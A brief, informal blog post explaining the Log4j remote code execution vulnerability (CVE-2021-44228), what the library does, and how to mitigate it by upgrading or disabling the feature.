On Friday 10 December 2021 through a new POC (Proof-of-Concept) addressing a Remote code Execution (RCE) vulnerability in the Java library ‘log4j’ was published. The vulnerability is being tracked as CVE-2021-44228. It is important to note that this exploit can be used by malware and other malicious software to take control of a system without requiring any user interaction.
What is Log4J?
Apache Log4j is a Java-based logging utility which is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of several Java logging frameworks which is a popular because of how simple it makes logging in Java.
Log4J is an extremely popular open-sources library used in Java to manage application logging. It is an extremely popular library among Java developers because of how simple it makes logging in Java.
Okay, but what does this vulnerability do?
One of the features presents in Log4j enables you to actually execute Java Code. Basically it allows external persons to take control of a system and all the information on it. Since this a RCE (Remote Code Execution) vulnerability, external malicious codes can run where ever Log4j is installed on. So yeah, it’s a big thing and should be closed immediately.
So, it’s dangerous. How can I fix this?
Different companies, such as vmWare have already posted workarounds here and here to fix the issues. Microsoft came with a statement about this as well. So basically you need to double check if your application and/or server are running Log4j or simply contact your vendor and apply the mitigation. You could update Log4J to version 2.15.0 / 2.16.0 or you could set the below system level property. This will simply disable the feature.
The reason why I’m posting this now is that I’ve been busy fixing this. So imagine my fun days at the office! 😉 Anyway, have fun fixing it!